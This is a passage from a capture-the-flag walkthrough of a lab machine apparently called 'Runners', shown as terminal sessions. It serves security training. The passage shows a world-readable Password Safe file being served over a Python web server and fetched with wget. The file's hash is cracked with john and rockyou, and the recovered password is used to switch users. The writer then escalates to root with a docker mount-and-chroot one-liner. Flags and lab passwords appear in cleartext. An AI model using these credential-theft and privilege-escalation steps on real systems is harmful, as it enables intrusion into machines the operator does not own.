just raised the bar for easy, resilient and secure K8s cluster deployment.

https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

2 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu Nov 28 20:42:23 2024 from 192.168.1.17
ian@TheHackersLabs-Runners:~$ cat user.txt
1927621ad6957f7c5812be72de560fea

Further enumeration finds a psafe3 file in user elliot's home directory, with permissions 644.

ian@TheHackersLabs-Runners:/home$ cd elliot/
ian@TheHackersLabs-Runners:/home/elliot$ ls -al
total 36
drwxr-xr-x 4 elliot elliot 4096 Nov 28 22:12 .
drwxr-xr-x 4 root root 4096 Nov 28 13:43 ..
lrwxrwxrwx 1 root root 9 Nov 28 15:54 .bash_history -> /dev/null
-rw-r--r-- 1 elliot elliot 220 Mar 31 2024 .bash_logout
-rw-r--r-- 1 elliot elliot 3771 Mar 31 2024 .bashrc
drwx------ 3 elliot elliot 4096 Nov 28 21:51 .cache
-rw------- 1 elliot elliot 20 Nov 27 00:06 .lesshst
-rw-r--r-- 1 elliot elliot 904 Nov 28 14:05 miscredenciales.psafe3
-rw-r--r-- 1 elliot elliot 807 Mar 31 2024 .profile
drwx------ 2 elliot elliot 4096 Nov 27 00:05 .ssh
ian@TheHackersLabs-Runners:/home/elliot$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.100 - - [17/Jan/2025 10:13:54] "GET /miscredenciales.psafe3 HTTP/1.1" 200 -
------------------ separator --------------------
❯ wget 192.168.60.158:8000/miscredenciales.psafe3
--2025-01-17 18:13:53-- http://192.168.60.158:8000/miscredenciales.psafe3
Connecting to 192.168.60.158:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 904 [application/octet-stream]
Saving to: ‘miscredenciales.psafe3’

miscredenciales.ps 100%[===============>] 904 --.-KB/s in 0.003s

2025-01-17 18:13:53 (289 KB/s) - ‘miscredenciales.psafe3’ saved [904/904]

❯ pwsafe2john miscredenciales.psafe3 >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
metallica (miscredencial)
1g 0:00:00:00 DONE (2025-01-17 18:15) 5.000g/s 20480p/s 20480c/s 20480C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The psafe3 password is metallica.

Open the password database and take a look.

It contains the user password HwbE80ZOtZQdkYB; log in with it.

ian@TheHackersLabs-Runners:/home/elliot$ su elliot
Password:
elliot@TheHackersLabs-Runners:~$ id
uid=1000(elliot) gid=1000(elliot) groups=1000(elliot),46(plugdev),110(docker)

The user belongs to the docker group, which is equivalent to root on the host, so escalate via Docker.

elliot@TheHackersLabs-Runners:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
1f3e46996e29: Pull complete
Digest: sha256:56fa17d2a7e7f168a043a2712e63aed1f8543aeafdcee47c58dcffe38ed51099
Status: Downloaded newer image for alpine:latest
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cat /root/root.txt
5477d00bdb98cf79191def03a598bab6